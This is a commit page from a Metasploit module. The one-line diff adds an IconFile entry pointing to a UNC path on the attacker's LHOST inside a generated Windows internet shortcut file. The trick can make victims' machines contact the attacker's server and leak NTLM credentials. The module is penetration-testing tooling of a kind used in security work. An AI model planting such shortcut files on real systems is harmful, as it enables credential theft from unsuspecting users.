Minor Improvement

URL File Creation also supports IconFile - this has now been added
GSoC/Meterpreter_Web_Console
rmdavy 2018-06-09 17:46:27 +01:00 committed by GitHub
parent 16fcaa3d00
commit f4334828d0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 0 deletions

View File

@ -136,6 +136,7 @@ class MetasploitModule < Msf::Auxiliary
url=""
url << "[InternetShortcut]\n"
url << "URL=file://#{datastore['LHOST']}/url.html"
url << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
file_create(url)
end